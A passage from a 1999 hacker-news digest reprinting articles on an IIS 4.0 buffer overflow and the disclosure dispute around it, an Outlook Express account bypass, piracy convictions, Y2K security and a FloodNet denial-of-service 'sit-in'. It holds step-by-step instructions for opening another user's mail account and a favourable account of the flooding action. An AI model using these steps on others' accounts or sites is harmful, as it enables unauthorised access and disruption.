to uncover the hole http://www.eEye.com/database/advisories/ad06081999/ad06081999-brain.html Exploit - How we did it and the code. http://www.eEye.com/database/advisories/ad06081999/ad06081999-exploit.html NetCat - TCP/IP "Swiss Army knife" http://www.l0pht.com/~weld/netcat/ Greetings go out to: The former Secure Networks Inc., L0pht, Phrack, ADM, Rhino9, Attrition, HNN and any other security company or organization that believes in full disclosure. Copyright (c) 1999 eEye Digital Security Team Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please e-mail alert@eEye.com for permission. Disclaimer: The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. Please send suggestions, updates, and comments to: eEye Digital Security Team info@eEye.com www.eEye.com -=- Wired; E-Commerce Sites: Open Sesame? by Niall McKay 11:40 a.m. 15.Jun.99.PDT A major security flaw in a Microsoft Web server could allow crackers to take complete control of e-commerce Web sites, security experts warned Tuesday. The flaw in Microsoft's Internet Information Server 4.0 allows unauthorized remote users to gain system-level access to the server, according to Firas Bushnaq, CEO of eEye, the Internet security firm that discovered it. "This hole is so serious it's scary," said Jim Blake, a network administrator for Irvine, a city in southern California. "With other [Windows NT] security holes, crackers have needed to gain some level of user access before executing code on the server. This is different.... Anybody off the Web can crack IIS," he said. More than 1.3 million Microsoft IIS servers are up and running on the Web. Nasdaq, Walt Disney, and Compaq are among the larger e-commerce operations run off the server, according to NetCraft Internet surveys. Microsoft confirmed that the problem exists and said that it is working on a fix. Customers, however, have not been notified. "Normally we will post the problem and the bug fix at the same time," said Microsoft spokeswoman Jennifer Todd. "We take these security issues very seriously, and the patch will be available [soon]." The fix will be posted to Microsoft's security Web site, "probably in the next couple of days," Todd said. The exploit is just one of a long list of security flaws affecting IIS 4.0. In May, security experts found an exploit that enabled crackers to gain read access to files held on IIS when they requested certain text files. Last summer, an exploit known as the $DATA Bug granted any non-technical Web users access to sensitive information within the source code used in Microsoft's Active Server Page, which is used on IIS. And in January, a similar IIS security hole was discovered, one that exposed the source code and certain system settings of files on Windows NT-based Web servers. But the latest problem appears to be the most serious because of the level of access it reportedly allows. "The exploit gives crackers access to any database or software residing on the Web server machine," said Bushnaq. "So they could steal credit-card information or even post counterfeit Web pages." For instance, crackers could exploit the bug to modify stock prices at one of the many news and stock information sites running IIS. The hole allows remote users to gain control of an IIS 4.0 server by creating what is known as a "buffer overflow" on .htr Web pages -- an IIS feature designed to enable users to remotely change their passwords. A buffer overflow can occur when a system is fed a value much larger than expected. In the case of the bug, the Dynamic Link Library (DLL) governing the .htr file extension, called ISM.DLL, can be overloaded by running a utility that loads too many characters into the library. Once overloaded, the DLL is disabled and the content of the overflow "bleeds" into the system. "Normally, this would just crash the system," said Space Rogue, a member of L0pht Heavy Industries, an independent security consulting firm that last year testified before the United States Senate on government information security. "But a good cracker can write an exploit where the data that overflows will actually be a executable program that will run as machine code," said Space Rogue. Such a move could give a cracker complete control of the target system. The overflow executable program can be used to run a system-level program that will deliver the equivalent of a DOS command window to an attacker's PC. To demonstrate the hole, eEye wrote a program called IIS Hack that will enable users to crack and execute code on any IIS 4.0 Web Server. However, disabling or removing the .htr password utility will not fix the problem, according to Bushnaq. "You have got to go through a series of steps to remove the faulty [code]." Eeye discovered the problem while beta testing a network security auditing tool. "Remote exploits are about the most serious problems you can have with a Web server," said Space Rogue. "It gives the attacker root privileges, so the cracker not only has access to the IIS server but [to] software running on that machine." "In many corporate sites today, this will give the cracker access to the entire network." Eeye is a software development firm specializing in security audit tools. Chief executive Bushnaq previously founded the electronic commerce site ECompany.com. -=- @HWA 45.0 Outlook Express 4.5 Email Bug ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 16th 1999 From HNN http://www.hackernews.com/ contributed by deepquest Maccentral.com is reporting on a bug in Outlook Express 4.5. Basically what it comes down to is if your machine has more than one email account, and you know the password for one account then you can gain access to all the accounts. Pretty damaging hole for multi users machines. MacCentral Online http://www.maccentral.com/news/9906/15.sonata.shtml Email encryption problems should be solved in Sonata by Dennis Sellers, dsellers@maccentral.com June 15, 1999, 9:45 am ET If you're using a free Mac email application, you inherently have a lack of secure encryption as Andrew Jung, a computer science student at Camosun College (Victoria BC, Canada), recently discovered. Jung was using Outlook Express 4.5 on the family iMac when he came upon what he described a "disturbing bug." Jung attempted to use the "Change Current User" menu item of Outlook Express to access his personal email account (three separate email accounts were on the family Mac) when he realized he'd forgotten his password. He clicked "Cancel" was returned to the account selection dialog. "I selected my step father's account, typed in his password, and got a message saying that his password was incorrect," Jung says. "I try again and again. No go. Then for the heck of it I looked up my password for my account, tried it, and got it. I did the procedure again over and over, and I can reproduce it every time. Whatever account I click and then cancel, that is the password for all the accounts." The situation can be reproduced this way: - Open Outlook Express and at the user account dialog select "New User." In the settings type in any password you want. - Select change user from File. - Select the newly created account, then click "OK." - Click cancel at the password prompt. - Select the user's account you would like to break into, and click "OK." - Type in YOUR password for the new account and you're in. DON'T try this at work or to access anyone's email account without permission. This was for "demonstration purposes" only. MacCentral contacted the Microsoft Macintosh Business Unit at Microsoft, and Product Manager Irving Kwong confirmed the problem. He says Outlook Express doesn't encrypt mail data stored in the application - but that the problem isn't unique to Microsoft's free email application. "Encryption functionality of mail data does not exist in any free Macintosh email application, as this level of security is best executed at the operating system level," Kwong says. "Outlook Express' password protection between multiple users on the same computer is not secure. The password merely acts as a padlock on users' personal preferences." So what is a secure solution? Kwong says it's coming with the next ramp of the Mac OS, codenamed Sonata. "You may remember Sonata's new multiple user environment being demonstrated at the WWDC," Kwong says (check out our story at http://www.maccentral.com/news/9905/10.sherlock.shtml). "We have been working on support for Sonata's multi-user functionality for Outlook Express and demonstrated this technology at the WWDC. This is the first offering of system-level security for multiple users sharing a Macintosh and is the best solution for true support, as it ensures password and data security. For Outlook Express customers and Macintosh users looking for a password secure solution for multiple users sharing a computer, we suggest using the upcoming version of Outlook Express with Sonata. The combination of Outlook Express and Sonata is a secure solution for Macintosh users doing email from the same computer. " Sonata is due in the second half of the year. @HWA 46.0 Major Pirates Convicted ~~~~~~~~~~~~~~~~~~~~~~~ June 16th 1999 From HNN http://www.hackernews.com/ contributed by Warez Dude Texan Convicted of Pirating $63mil, in Germany. A German State court has sentenced a Texas man to four years in prison for three counts of counterfeiting Microsoft programs. Microsoft said that this case was the "biggest in terms of the operation's sophistication and the magnitude of damage." Nando Times http://www.techserver.com/story/body/0,1634,60053-95659-682086-0,00.html Wired http://www.wired.com/news/news/politics/story/20239.html ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2276234,00.html Father and Son, Busted. Father and son where convicted in Massachusetts of conspiring to sell $20 million in stolen Microsoft Software. The father was fined over $1 Million and sentenced to almost six years in jail, the son was fined $100,000 and got ten months in jail. Nando Times http://www.techserver.com/story/body/0,1634,60069-95685-682199-0,00.html Nando Times; Texan convicted of software piracy in Germany Copyright © 1999 Nando Media Copyright © 1999 Associated Press AACHEN, Germany (June 15, 1999 3:33 p.m. EDT http://www.nandotimes.com) - A German state court convicted John-Joseph Staud, a Texas man, on Tuesday of counterfeiting more than $63 million worth of Microsoft computer programs. Staud, 39, was sentenced to four years in prison for three counts of counterfeiting patented programs and smuggling them into Germany for commercial purposes. Microsoft Corp. greeted the court's decision as "a meaningful signal" toward thwarting computer piracy. The software giant, based in Washington state, said the counterfeit case was its biggest in terms of the operation's sophistication and the magnitude of damage. The court denied Microsoft's request for damages, saying that should be handled by a court in England, where Staud allegedly ran a counterfeit compact disc production plant and printing operation. He also faces charges in England. Charges against Staud stemmed from a German customs office investigation last August that uncovered 300,000 counterfeited CD-ROMs with programs such as MS Office, Windows 95, and Windows NT, along with 400,000 installation handbooks. The materials, which had been smuggled into Germany, were found in a rented container and a warehouse in the town of Kreuzau, about 20 miles east of Aachen, which is located on the border with Belgium. -=- Wired; Germany Jails Software Pirate Reuters 4:30 p.m. 15.Jun.99.PDT A German court sentenced an American man to four years in prison without probation Tuesday for importing illegally copied Microsoft computer software. It was the first time Germany has issued a prison sentence in a crime involving software piracy, Microsoft (MSFT) said. "The 39-year-old Texan was sentenced today for four years without probation," a spokesman for the German regional court of Aachen said. The sentencing of the man, identified only as John S., follows the seizure by German customs officials of thousands of illegal copies of Microsoft software programs and manuals last August. Microsoft said fraud was proved in several instances in the case, with total damages amounting to about 120 million marks (US$64 million). "This sentence is a breakthrough in Germany and shows that counterfeiting software is really a serious crime," Rudolf Gallist, general manager of Microsoft GmbH, said in a statement. - - - More MS Software Pirates Jailed: Three more defendants in the "Crazy Bob's" stolen software ring were sentenced this week, federal prosecutors said Thursday. The three are the latest to be sentenced for their part in a conspiracy to sell US$20 million in Microsoft Corp. software stolen from a Massachusetts disc manufacturer. Marc Rosengard, an employee of Crazy Bob's discount computer shop in Wakefield, Mass., was sentenced on Thursday to 33 months in prison and three years supervised release, and must pay $20,000 in restitution to Microsoft, prosecutors said. Another defendant, Maxine Simons, 59, was sentenced on Wednesday by US District Court Judge George O'Toole to two years and nine months in prison and ordered to pay restitution of $908,000, prosecutors said. Her husband Robert Simons, who ran Crazy Bob's, was given a 70-month prison sentence on Tuesday. Their son, William Simons, was sentenced to one year and 10 months on Tuesday. Also sentenced on Wednesday was Gerald Coviello, 62, to two years and six months in prison. Maxine Simons and Coviello were convicted of conspiracy to transport stolen property following a three-week jury trial in March. Among other misdeeds, Crazy Bob's was accused of buying and reselling 32,000 stolen copies of Microsoft Office 97 Professional Edition. Worth $599 apiece, they were acquired from rogue former employees of KAO Infosystems of Plymouth, Massachusetts, which manufactured the discs. Copyright© 1999 Reuters Limited. -=- Nando Times #2 Sellers of $20 million of stolen software sentenced to prison Copyright © 1999 Nando Media Copyright © 1999 Reuters News Service BOSTON (June 15, 1999 4:04 p.m. EDT http://www.nandotimes.com) - A father and son pair accused of conspiring to sell more than $20 million in Microsoft Corp. software stolen from a Massachusetts manufacturer were sentenced to prison, prosecutors said Tuesday. Robert Simons, 62, who ran Crazy Bob's discount software store in Wakefield, Massachusetts, was sentenced to five years and 10 months imprisonment by U.S. District Judge George O'Toole Monday. Simons was also ordered to pay $908,000 in restitution to Microsoft and to forfeit $440,000 to the federal government. His son, William Simons, 35, a Crazy Bob's salesman, was sentenced to one year and 10 months in prison, and must pay $100,000 to Microsoft, prosecutors said. Crazy Bob's was accused of buying millions of dollars worth of computer discs stolen from KAO Infosystems, a disc manufacturer in Plymouth, Massachusetts, by two ex-KAO workers. The two former KAO employees pleaded guilty to related charges and were awaiting sentencing, prosecutors said. Among other misdeeds, the Simons were accused of buying 32,000 stolen copies of Microsoft Office 97 Professional Edition, worth $599 apiece, and reselling them to CD-ROM outlets in California and Great Britain, prosecutors said. @HWA 47.0 Fear of Y2K Raises Security Concerns ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 16th 1999 From HNN http://www.hackernews.com/ contributed by roach Australia Concerned Over Y2K and Security Fear that the Y2K bug will cause weaknesses in computer security are being raised. Some companies are spending money on Y2K issues and are ignoring important security issues. The fear is that cyber attacks may be misinterpreted as run of the mill Y2K problems. Australia News http://technology.news.com.au/techno/4297150.htm Australian Financial Review http://www.afr.com.au/content/990615/update/update38.html DOD Plans for Possible Y2K Attack The US DOD has started evaluating possible scenarios for cyber attacks that may be masquerading as Y2K computer glitches. While not saying how possible such an attack may be DOD said it is just being prepared for any contingency. Federal Computer Week http://www.fcw.com:80/pubs/fcw/1999/0614/web-cybery2k-6-15-99.html Australian News; Bug scare aids cyber terror By STEFANIE BALOGH 16jun99 THE Y2K bug has left computer systems around the world vulnerable to cyber terrorist attacks when the new millennium dawns, an international computing expert warned yesterday. Constance Fortune, vice-president of Canada's Science Applications International Corporation, said because companies had focused resources on Y2K compliance, they had left their operations open to other security risks. Speaking at the 11th FIRST (Forum for Incident Response Security Team) computer security conference in Brisbane, Ms Fortune said amateur hackers and cyber criminals were poised to wreak havoc on New Year's Day and beyond. She predicted the problems could be more disastrous than any virus because multinational and government computer systems would be at their weakest. "Those who create viruses, worms and other destructive computer phenomena have found ways to take advantage of the Y2K problem," she warned. Ms Fortune said it was crucial for computer emergency response teams to be able to determine whether system failure was the result of Y2K problems or camouflaged security attacks. Ms Fortune also said northern hemisphere firms would closely watch as Australia embraced the millennium, hours before the US, Europe and Britain. "What happens in Australia as 2000 rolls in will provide us with a much-appreciated early warning of what we can expect only hours later," she said. Her warnings were echoed by information technology security expert Bill Caelli, who predicted the security problems caused by companies focusing on Y2K compliance could continue for 12-18 months. Professor Caelli, from the Queensland University of Technology, also said business and government had "lost 20 years" of work on computer security because they were more interested in cost-cutting. He also called for the Australian Government to introduce tougher legislation to force companies to upgrade information security and for the Government to end the practice of outsourcing its IT capabilities. -=- Federal Computer Week; JUNE 15, 1999 . . . 16:33 EDT DOD preps for possible cyberattacks brought on by Y2K BY BOB BREWIN (antenna@fcw.com) The Pentagon has started to develop plans that would shut back doors that hook its global networks to the Internet in case cyberfoes try to use any Year 2000 computer date code snafus to mount a cyberattack. Marvin Langston, deputy assistant secretary of Defense for command, control communications and intelligence, declined to estimate the possibility of such a cyberassault. He said the Pentagon has started to develop contingency plans to protect its networks at the end of the year in case "cyberattackers try to mask themselves in the confusion." "We want to be able to close down our back doors," said Langston, speaking at GovTechNet, a Washington, D.C., conference sponsored by FCW and the Armed Forces Communications and Electronics Association. Langston said hacker Web sites and discussion groups have mentioned seizing the opportunity to launch cyberattacks against DOD by using any computer or network that may be malfunctioning because of Year 2000 problems. DOD "has to be prepared to deal with it," Langston said. -=- @HWA 48.0 Israeli Banks Thwart Attempted Cyber Break-In ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 16th 1999 From HNN http://www.hackernews.com/ contributed by LirA Buried down in the fifth paragraph is a statement by Bank of Israel Supervisor of Banks Dr. Yitzhak Tal, who claims that the Israeli banking system has been the target of "primitive and insignificant" cyber attacks. Israel's Business Arena http://www.globes.co.il/cgi-bin/Serve_Archive_Arena/pages/English/1.2.1.20/19990614/1 Tuesday , Jun 15, 1999 Sun-Thu at 18:00 (GMT+2) Headlines Tal: Hackers Tried to Break Into Internet Banking Services By Zeev Klein Bank of Israel Supervisor of Banks Dr. Yitzhak Tal is opposed to mergers between large banks, because the Israeli banking system is still too centralist. Briefing economic correspondents yesterday upon the publication of the annual banking system report for 1998, Tal said, "It’s impossible to draw comparisons between Israel and the US or Europe. There, too, it’s still not clear what’s the cause for bank mergers. We’re different from them, and we must be more careful." According to Tal, mergers between small banks are not really beneficial. "I’m in favor of mergers between small banks, and against mergers between big banks. But a small bank plus a small bank gives yet another small bank," Tal said. As for mergers between medium-size banks, Tal said that the issue is under examination by the Bank of Israel. He stressed, however, that "at the moment we’re not faced with any specific request on which we must take a decision. We are rather seeking to work out our position in principle on the issue. There are arguments both ways. On the one hand, mergers between medium-size banks will increase the centralism of the system, which is very considerable as it is. On the other hand, it may well be that a new banking player that would compete with the large banks will enhance competitiveness. Our key consideration is improving competition, rather than stability," Tal said. Referring to the expansion of Internet banking services, Tal said, "We don’t have to be the trail blazers on Internet worldwide. We must be cautious, and see how this area develops throughout the world." Tal disclosed that hackers had recently attempted to break into the Internet banking system, but added that the efforts were primitive and insignificant, and did not result in any real damage to customers or to the banks. Tal did not expect any Y2K-related massive malfunction that might wipe out public deposits. According to him, "Public deposits aren’t going to be virtually wiped out.." Tal added that the banks are taking the proper measures to cope with Y2K. Published by Israel's Business Arena June 14, 1999 @HWA 49.0 Navy Wants Tighter Network Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 16th 1999 From HNN http://www.hackernews.com/ contributed by Lif3r The US Navy is looking into adding real-time intrusion detection capabilities into its network defenses. Federal Computer Week http://www.fcw.com:80/pubs/fcw/1999/0614/web-navy-6-15-99.html JUNE 15, 1999 . . . 12:55 EDT Navy looks to upgrade network security BY DIANE FRANK (diane_frank@fcw.com) As part of its overall security strategy, the Navy is looking at several new auditing products that can offer real-time intrusion detection. The Navy is using the auditing and other security features that are part of Microsoft Corp.'s Windows NT and variations of the Unix operating system. But the Navy can only use that technology to find out about intrusions into a network after the fact, Cmdr. Larry Downs, director of operations for the Navy Fleet Information Warfare Center, said today at the GovTechNet conference in Washington, D.C. Companies recently have released several products that will enable Navy network administrators to learn about intrusions and attacks as the attacks occur. The Navy is interested in incorporating the products into its network security, Downs said. "The Navy is looking closely at this and will probably look to buy in the very near future," he said. @HWA 50.0 IIS Hole Continues to Make News/Fix Available ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 17th 1999 From HNN http://www.hackernews.com/ contributed by Marc The major hole publicly announced yesterday by eEye Digital Security Team in Microsofts Internet Information Server is continuing to make news. Internet News http://www.internetnews.com/prod-news/article/0,1087,9_139231,00.html ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2277295,00.html eEye Releases Fix Microsoft has issued a workaround for this bug however it does break functionality such as /iisadmpwd/. eEye Digital Security Team has released their own fix that resolves the problem and preserves functionality. It limits .htr requests to 200 characters, and logs the IP address of the person trying the overflow. This is a great deal better then the current recommendation from Microsoft which is to just remove the .htr ISAPI filter. eEye Digital Security Team http://www.eeye.com/database/advisories/ad06081999/ad06081999-ogle.html Microsft http://www.microsoft.com/security/bulletins/ms99-019.asp CERT Advisory Released A day late and a dollar short CERT (Computer Emergancy Responce Team) has released an advisory concerning this major problem. Unfortunatly they forgot to credit who found the problem. CERT http://www.cert.org/advisories/CA-99-07-IIS-Buffer-Overflow.html Irresponsible Security Companies This article on C|Net questions whether eEye did the right thing by releasing their advisory before Microsoft was ready with their patch. A quote in the article from a Microsoft representative called this "contrary to all of the normal rules of responsible security professionals." [rant on] Bullshit. The company that has shown the public how irresponsible they are is Microsoft. Microsoft knew about this problem for a week but did nothing until it was released to the public. It is extremely likely that someone else found this hole and did not tell anyone. They could have used this problem to install back doors on most of the servers in the world without anyone knowing. Microsoft could have stopped this action a week earlier and didn't. Microsoft is the one who is not acting like a 'responsible security professional'.[/rant off] C|Net http://www.news.com/News/Item/0,4,37949,00.html?st.ne.fd.mdh.ni C|Net; Microsoft server bug wrongly publicized? By Stephanie Miles, Stephen Shankland, and Wylie Wong Staff, CNET News.com June 16, 1999, 6:50 p.m. PT Microsoft offered a temporary fix for a problem with its Web server software that lets attackers "inject" a program that can run on a Windows NT-based system. In the meantime, the manner in which the bug was reported and publicized is generating controversy. The bug attacks Internet Information Server, Microsoft's software for serving up Web pages. Putting the right type of malicious code into a page request can cause IIS to crash, or worse, let an attacker run whatever programming code he wants. Firas Bushnaq, CEO of Eeye, today accused Microsoft of dragging its feet to solving the problem. His company alerted Microsoft on June 8, he said, but Microsoft told him to keep quiet about it. Bushnaq said he went public yesterday because he felt Microsoft wasn't doing anything to resolve the issue. But Bushnaq didn't stop at just publicizing the bug, and that's where the controversy comes in: EEye posted a program that will exploit the weakness, a move Microsoft says runs contrary to established procedures for reporting and patching bugs. Not surprisingly, Microsoft disputes Bushnaq's version of the story. "You can send a 'malformed' or very long request to a Web server. It could cause a buffer overflow, which means you can embed application code that will execute on the server," Bushnaq explained of the bug. "Anything that is residing on the Web server and everything connected to that--back-end databases, e-commerce information, credit card information--could be accessible," he continued. "It is extremely important for people to fix it." "We've got a security response process that we set up a year ago so that customers would have a place to report bugs and so that we could respond to it quickly," countered Scott Culp, a security product manager for Microsoft. No confirmed problems occurring as a result of the bug have been reported, he said. "For reasons we don't understand, at the beginning of this week they [Eeye] suddenly went public with the bug. It's contrary to all of the normal rules of responsible security professionals," he said. "You don't provide tools that malicious users can use to hurt innocent people." Microsoft rushed to post a workaround to the problem, but a true fix to patch the bug is not yet available. The workaround will protect users from malicious or arbitrary code, Culp said. "We're completing the patch right now, but we need to make sure that we've fully tested it. In the meantime, nobody needs to be vulnerable because of the workaround," he said. @HWA 51.0 World Braces for International Day of Action ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 17th 1999 From HNN http://www.hackernews.com/ contributed by barbie Officials in Australia and around the world are bracing for International Day of Action on June 18th known as J18. June 18 is also the same day as the G8 meeting in Cologne, Germany. J18 organizers are calling for disruption of financial centers, banking districts and multinational corporate power bases. Examples of possible activities include picketing, street parties, leafleting, rallies, marches, strikes, carnivals, and of course 'hacking'. Australian Financial Review http://www.afr.com.au/content/990616/update/update37.html Australian Financial Review - Yes, there are two stories J18 hackers 'could target Australia' on Friday Australian companies could be targeted by computer hackers this Friday as part of an international day of action against big business, a computer security conference was told today. But for those companies without adequate computer security, it may be too late to bolster defences, Byron Collie, from Australian Federal Police's national computer crime team said. Mr Collie told the conference the international day of action on Friday, known as J18, could include cyberattacks on business and banking computer networks. The J18 action coincides with the G8 meeting in Cologne, Germany. The official J18 site on the Internet calls for people to plan individual "actions" focusing on disrupting "financial centres, banking districts and multinational corporate power bases". "It is up to the groups themselves to decide what to do on the day," it says. "Examples could include picketing, street parties, leafleting, rallies, marches, strikes, carnivals, hacking, blockades, whatever." Mr Collie said there was a growing trend for computer hacking to be politically motivated and for a number of hackers to work in cooperation. "Motivation for these (hacking) activities have changed slightly from the usual teenage intruder-type activity," he told the Computer Security Incident Handling and Response conference. "There's a lot more political and issue motivated activities." Mr Collie said one example of "hackdivism" occurred during the Kosovo conflict when a Serbian computer expert distributed an e-mail calling for all Serbs throughout the world to launch a concentrated cyberattack on the computer systems of NATO countries. Late last year, as Indonesia was preparing for its elections, hackers shut down an East Timorese website based in Ireland, he said. "I would hope that you have every measure already in place," he told the conference delegates. AAP @HWA 52.0 ECD Targets Mexican Government ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 17th 1999 From HNN http://www.hackernews.com/ contributed by stealth The people at Electronic Civil Disobedience are planning a virtual 'sit-in' in protest of the treatment of the Zapatistas by the Mexican government. The sit-in will basically be a DoS attack against several Mexican government internet sites. This demonstration is planned to take place on June 18 from 10:00am to 4:00pm Mexico City time. Electronic Civil Disobedience http://www.thing.net/~rdom/ecd/ecd.html The June 18th Sit-in report from ECD ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ JUNE 18: THE VIRTUAL AND THE REAL ACTION ON THE INTERNET AND IN AUSTIN, TEXAS ZAPATISTA FLOODNET AND RECLAIM THE STREETS by Stefan Wray, June 19, 1999, 6:00 CDT "The resistance will be as transnational as capital." On June 18, 1999, simultaneous with the G8 meeting in Koln, Germany, people all over the world participated in actions and events under the banner "Reclaim The Streets." Email reports coming in today indicate that 10,000 people gathered in Nigeria and that San Francisco drew crowds of around 500. More news and reports of events will surely be posted in the coming days. What follows is a contribution to this emerging body of material. Reclaim the Streets European Headquarters http://www.gn.apc.org/rts/ Below are two separate and very different reports. The first describes the results of the virtual sit-in called by the Electronic Disturbance Theater opposing the Mexican government that involved thousands of people from 46 countries. The second is a longer narrative account describing events as they unfolded in Austin, Texas, an action that involved about 50 people and resulted in three arrests. It ends with some comments on hybridity, meshing the virtual and the real. THE VIRTUAL On June 15, the Electronic Disturbance Theater began sending out email announcements urging people to join in an act of Electronic Civil Disobedience to stop the war in Mexico. The call made in conjunction with the Reclaim The Streets day of action was intended to introduce a virtual component to the numerous off-line actions happening all over the world. But a strong motivation for the action was also due to the fact that in recent weeks there has been a significantly higher level of government and military harassment of Zapatista communities in Chiapas, with reports indicating as many as 5,000 Zapatistas have fled their communities. The suggested action was for people using computers to point their Internet browser to a specific URL during the hours of 4:00 and 10:00 p.m. GMT. By directing Internet browsers toward the Zapatista FloodNet URL, during this time period, people joined a virtual sit-in. What this meant was that their individual computer began sending re-load commands over and over again for the duration of the time they were connected to FloodNet. In a similar way that people were out in the streets, clogging up the streets, the repeated re-load command of the individual user - multiplied by the thousand engaged - clogged the Internet pathways leading to the targeted web site. In this case on June 18, FloodNet was directing these multiple re-load browser commands to the Mexican Embassy in the UK. (http://www.demon.co.uk/mexuk) The results of the June 18 Electronic Disturbance Theater virtual sit-in were that the Zapatista FloodNet URL received a total of 18,615 unique requests from people's computers in 46 different countries. Of that total, 5,373 hits on the FloodNet URL - 28.8 percent - came from people using commercial servers in the United States - the .com addresses. People using computers in the United Kingdom accounted for the second largest number of participants, 3,633 or 19.5 percent. People with university accounts in the U.S., 1,677 of them, made up the third largest category of participants at 9.0 percent. Interestingly, the fourth largest category of participants came from .mil addresses, from the U.S. military, for which there were 1,377 hits on the FloodNet URL, at 7.4 percent. Included among the military visitors were people using computers at DISA, the Defense Information Systems Agency. [In the same way that police help to block the streets when they show up at a demonstration, the military and government computer visitors to the FloodNet URL inadvertently join the action.] And the fifth largest group of participants were from Switzerland with 1,276 or 6.8 percent. The remaining 5,329, or 28.6 percent, of global participants in the June 18 virtual sit-in came from all continents including 21 countries in Europe (Austria, Belgium, Czech Republic, Denmark, Estonia, Finland, France, Germany, Greece, Hungary, Ireland, Italy, Lithuania, Macedonia, Netherlands, Norway, Poland, Portugal, Spain, Sweden and Yugoslavia), 7 countries in Latin American (Argentina, Brazil, Chile, Colombia, Mexico, Peru and Uruguay), 6 countries in Asia (Indonesia, Japan, Malaysia, Singapore, South Korea and Taiwan), 5 in the Middle East (Bahrain, Israel, Qatar, Saudi Arabia and Turkey), Australia and New Zealand, Canada, Georgia (former Soviet Union), and South Africa. The global Zapatista FloodNet action on June 18 is the first that the Electronic Disturbance Theater called for in 1999. The group began in the spring of 1998 and launched a series of FloodNet actions directed primarily against web sites of the Mexican government, but action targets also included the White House, the Frankfurt Stock Exchange, the Pentagon. The highlight was in September when the group showcased FloodNet at the Ars Electronica festival on Information Warfare in Linz, Austria. At that time one of the targets of FloodNet was a U.S. Department of Defense web site. This action is noteworthy because a Pentagon countermeasure since it may be one of the first known instances in which the DOD has engaged in an offensive act of information warfare against a domestic U.S. target - an act some say could have been illegal. More details on the Electronic Disturbance Theater can be found at: http://www.thing.net/~rdom/ecd/ecd.html THE BEGINNING OF THE REAL I turned off my computer, moved away from the screen, and left work at 5:00. My girlfriend picked me up in the car and we passed by the bank so I could cash my paycheck. Good thing too. My balance had literally been 99 cents. Then we drove to the radio station, KOOP, where we do a half-hour news program every Friday. It was hot inside the station, as it was outside. But the studio was nice and cool, so we sat there and waited for the Working Stiff show to end and the news to begin. We listened to John do a phone interview with someone from the pipe-fitters union. They were talking about a strike. We started off the news with a long piece from A-Infos about the World Trade Organization. It was a decent article but a bit too long to read on the air. The piece ended with a call for people to travel to Seattle later in the year to oppose the third WTO ministerial conference. After the news we walked over to join a handful of IWW folks who put out the Working Stiff Journal. They were at Lovejoys, a bar with a decent selection of beer just off 6th Street. I started talking to a few friends about the war in Yugoslavia and an idea I'd had that it might good to form a focus group on the history, present, and future of war. The idea being that the left doesn't really understand war anymore, or rather, that the left is using the same techniques to oppose war that it used 30 years ago, but that the way wars are fought has changed. The few who I talked to supported the idea and had some good suggestions. RUTA MAYA After swilling down a few pints, at around 7:30, my girlfriend and I left Lovejoys and drove over to Ruta Maya. All I knew was that the Critical Mass bike ride was to end up there. And the ride was Austin's effort to be part of the global Reclaim The Street actions that were happening all over the world. Ruta Maya is a coffee shop in downtown Austin's warehouse district. They import coffee from Chiapas. Local activist groups often stage benefits and events there. When we got to Ruta Maya people from the bike ride were already filtering in. They had started the ride up by the university. I wasn't on the ride so I only heard snapshots of what had happened. But I learned that a few had spent the previous night working on some stickers that said, "Closed" and "Out of Order." These were to put on ATM machines and other relevant symbols of capital. The ride passed by the Gap. For a moment Gap workers were harassed for selling clothes manufactured in sweatshops. The crowd inside and outside on the elevated sidewalk was a mix of Ruta Maya regulars, people who came to hear an acoustic guitarist playing inside, customers of Ruta Maya's cigar shop, anyone who happened to be walking by, and of course the cyclists from the Critical Mass/RTS ride. First I talked to some people involved in Free Radio Austin, a local micropower radio station shut down by the FCC a few weeks ago - which is incidentally scheduled to go back on the air today. We didn't talk about that, but about some of the problems with a new space here called Pueblos Unidos. A long story, but basically there is a power struggle among the original tenets of this allegedly collective warehouse space on the eastside of Austin. Too complicated to go into here. Conversations about Pueblos Unidos, the Grassroots News Network, and Point A threaded through the evening. The riders included people I've know from Earth First!, from the local bicycle activist scene, and a whole new set of folks from Point A who I don’t really know. I just thought that Ruta Maya was a gathering point after the ride was finished. But it turned out to be something else. THE STREET After not long, some people started talking about how to encourage others to start standing out in the street in front of Ruta Maya. People had just finished the ride and were all charged up with energy. A moment later, two young riders were moving a construction barricade and a few orange cones into the lane of traffic coming from the west. While at the other end of the block a group took similar barricades and placed them to stop traffic coming from the east. And then, one at a time, people started leaving the sidewalk or leaving the edges of the street to stand out in the middle. For a little while there were just about 10 people. A few standing near the barricade. A few more down at the other end of the street. And more starting to filter out right in front of Ruta Maya. I actually hadn't anticipated this. I wanted to sit down so I asked someone to pass me down a chair from the elevated sidewalk. I sat on the chair in the middle of one lane. Someone else picked up another chair and sat down near me. With barricades on both ends of the block, people sitting in chairs, cars lurching forward slowly and trying to get out, others in Ruta Maya started to take notice, and those less inclined to be the first ones to venture out into the street, followed. A Ruta Maya worker came out and said that needed his chair back. I didn't argue. Ruta Maya is a cool place. And by sitting there momentarily it had served to encourage a few more to join. Soon there were people in both lanes of traffic out in front of Ruta Maya. At its peak maybe there were as many as 50. Not a huge crowd. Enough to reclaim the street - temporarily. But not enough to remain once the police started to arrive. And of course they did. But before the police showed up, a few of the people whose idea it was to reclaim this particular section of street spoke loudly and explained what Reclaim The Streets was all about. Small flyers titled "Whose City Is This Anyway?" were passed out. And people started doing a "cheer" of sorts. Lacking were drums or other instruments that are always good for stirring up a crowd. THE POLICE I first noticed a brown shirted Sheriff's deputy get out of a sports utility vehicle. But he simply walked by, seemingly oblivious to what was happening. Soon thereafter the bike cops 